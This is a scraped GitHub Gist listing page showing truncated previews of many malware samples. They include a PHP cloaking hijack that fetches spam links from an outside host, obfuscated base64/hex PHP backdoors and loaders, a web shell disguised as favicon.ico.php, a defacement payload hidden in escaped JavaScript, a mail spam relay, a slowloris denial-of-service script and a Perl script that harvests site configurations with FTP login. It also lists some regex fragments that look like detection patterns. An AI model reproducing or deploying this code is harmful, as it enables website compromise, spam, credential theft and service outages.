Skip to content

Instantly share code, notes, and snippets.

Palma Solutions LTD PalmaSolutions

Block or report user

Report or block PalmaSolutions

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View hijack
<?php
if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){
$ch = curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, 'http://message.vaultpos.com/2017alllinks02-1.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
echo $file_contents;
View unknown-malware15.php
<?php
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors',0);
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5';
$pass = "Zgc5c4MXrKk0ZQwD69BWJ/PdPFbQdr9dm2WSGbE=";
if (ini_get('allow_url_fopen')) {
function get_data_ya($url) {
$data = file_get_contents($url);
View unknown-malware.js
<script>document.documentElement.innerHTML = unescape('%0d%0a%0d%0a%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%2f%48%61%63%6b%65%64%20%42%79%20%50%73%79%63%6f%20%4d%69%73%74%65%20%26%20%48%61%74%74%61%62%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%62%72%3e%3c%62%72%3e%0d%0a%3c%70%20%61%6c%69%67%6e%3d%22%63%65%6e%74%65%72%22%3e%3c%62%3e%3c%66%6f%6e%74%20%66%61%63%65%3d%22%62%6f%6c%64%22%20%73%69%7a%65%3d%22%38%22%3e%20%50%73%79%63%6f%20%4d%69%73%74%65%20%26%20%48%61%74%74%61%62%20%3c%2f%66%6f%6e%74%3e%3c%63%65%6e%74%65%72%3e%0d%0a%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%0d%0a%3c%70%20%61%6c%69%67%6e%3d%22%63%65
View unknown-malware14.php
<?php
$ckaszjpfiozxj = stripslashes($_POST['rbfjbbz']);
$gsqsgwkta = stripslashes($_POST['hqmtnfp']);
$mhhpxa = stripslashes($_POST['cmkv']);
$sawdwtr = mail(stripslashes($ckaszjpfiozxj), stripslashes($gsqsgwkta), stripslashes($mhhpxa));
if($sawdwtr){echo 'wdrtoairr';} else {echo 'blaas : ' . $sawdwtr;} ?>
View unknown-malware13.php
<?php function .+? = ''; for($i=0; $i < strlen($o); $i++) .+? .= isset($ .+? ="base64_decode";return $
my $out = `ldd /usr/bin/host`;
$_SERVER)===TRUE){$ .+? }function error_404(){header( .+? ]}=preg_replace("/( .+? ="/".uniqid().uniqid();${
echo 'action error'; .+? echo "publish success";
.chr(48)."KaW".chr(89).
echo $ok ? "SHELL_OK" : "SHELL_BAD";
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');
<!DOCTYPE html> <?php eval(base64_decode('.+?));?>
// ProGraMmeD By BaD-BoY [
DZS Upload
View unknown-malware20.php
<?php
${"GL\x4f\x42\x41\x4c\x53"}["\x69\x68\x66\x6b\x76bw\x71\x6fo\x6es"]="t\x79\x70\x65\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75tf\x69h\x61\x73"]="\x6f\x75t";${"\x47\x4cOB\x41\x4cS"}["\x73\x6dp\x62\x67\x6b"]="\x75r\x6c";${"GL\x4f\x42\x41\x4c\x53"}["l\x75\x70f\x6b\x6ep\x70\x75\x67"]="\x73\x6fc\x6be\x74";${"G\x4c\x4f\x42\x41LS"}["\x68\x75\x72\x74\x66\x6f\x6f\x74d\x77\x62"]="\x61\x64dr\x65\x73s";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x79xcw\x64vn\x6c"]="\x75a";${"\x47\x4c\x4f\x42AL\x53"}["\x6bqc\x6f\x6ac\x67s\x71\x63"]="\x72\x65\x73";${"\x47L\x4f\x42A\x4c\x53"}["\x69dwr\x70\x6ewz\x77"]="\x64o\x6d\x61i\x6e";${"\x47LO\x42\x41\x4cS"}["z\x6e\x68k\x70qe\x63"]="\x78";${"GLO\x42\x41\x4cS"}["k\x6fhe\x63\x69j\x70"]="\x64\x65\x66\x61ul\x74\x5f\x70ort";${"\x47\x4c\x4fB\x41L\x53"}["\x73\x7a\x72q\x66\x76\x79\x79"]="\x72\x65s\x75lt";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x64l\x75\x6a\x73\x69o\x69\x73\x68"]="\x73\x69\x74e";@ini_set("disp\x6ca\x79\x5fer\x72\x6frs","\x4f\x66\x66");global$ua;$npmsrlswy="\x73\x69\x74\x65";$ucx
@PalmaSolutions
PalmaSolutions / slowloris.pl
Created Aug 11, 2017
Poisonous HTTP Client
View slowloris.pl
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
View sepi.pl
#!/usr/bin/perl
# [!] confspy.pl v1.1 for /home/$user/public_html
# [!] Private Script !!!
# c0li.m0de.0n Begin !!!
# Please check ftp connection before enable it.
# 0=disable, 1=enable
my $ftp_login = 1;
View favicon.ico.php
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
$dqvngqtl = 3668; function cahzfuo($rxcvscdxez, $vgbtdue){$ohnusitt = ''; for($i=0; $i < strlen($rxcvscdxez); $i++){$ohnusitt .= isset($vgbtdue[$rxcvscdxez[$i]]) ? $vgbtdue[$rxcvscdxez[$i]] : $rxcvscdxez[$i];}
$xcygvdvew="base" . "64_decode";return $xcygvdvew($ohnusitt);}
$fuuvacow = '1ujObQfh7yINnEGi9bCInvVrnIwF7EnvDbfmGJSR90FObQfh7yINnEGi9bCF7ECN3qVU7ZVeVUAtRbQx1uh2'.
'TlMhqZOICbtv7lHaqEGa3lOcCpIr7IwiTlcIVUAtRbQx1uh23qVU7ZVNnyGA7ZViTlMv912hm'.
'Ai9uXOICHwiTlcIqESh7lIi912hmAi91ujObyIy9bHQ3l3h7yGQ9bVu8HfN5JwRW6Qh1uhx1'.
View unknown-malware-12.php
<?php
@session_start();
@set_time_limit(0);
//PASSWORD CONFIGURATION
@$pass = $_POST['pass'];
$chk_login = true;
$password = "BA";
You can’t perform that action at this time.